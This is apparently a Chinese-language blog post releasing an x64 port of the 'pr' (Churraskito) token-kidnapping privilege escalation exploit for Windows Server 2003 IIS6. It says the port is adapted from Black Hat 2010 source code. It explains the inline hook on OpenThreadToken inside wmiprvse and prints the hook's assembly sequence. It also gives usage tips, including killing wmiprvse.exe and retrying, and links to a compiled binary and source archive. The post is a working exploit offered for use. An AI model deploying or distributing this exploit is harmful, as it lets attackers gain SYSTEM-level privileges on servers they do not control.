x64版的pr(iis6),修改自:https://media.blackhat.com/bh-us-10/source/Cerrudo/Source.zip里面的Churraskito。
pr的核心部分之一是inline hook wmiprvse里面OpenThreadToken,使得获取到的令牌能够模拟,由于x64下调用约定不同导致不能通用。这里是修改后的x64专用版本,在新安装的2003 r2 x64企业版上测试成功。
PS:
多长时间成功看人品,有时候要等个一分钟半分钟左右。
多次未成功的话,taskkill /f /im wmiprvse.exe后再执行有惊喜。
关键代码:
//OpenThreadToken+0h mov rax,jmp_to jmp rax //jmp_to or edx,0ch sub rsp,28h call 0h add qword ptr [rsp],11h mov rax,ntdll!NtOpenThreadToken jmp rax test eax,eax push lowpart //(QWORD)OpenThreadToken+0x0c 低四位 mov qword ptr [rsp+4h],highpart//高四位 ret
下载: prx64.zip
百度网盘:http://pan.baidu.com/s/1eQmZSX0
源码(vs2010工程): Churraskito64-src.zip
百度网盘:http://pan.baidu.com/s/1sj9FlP7
解压密码见注释。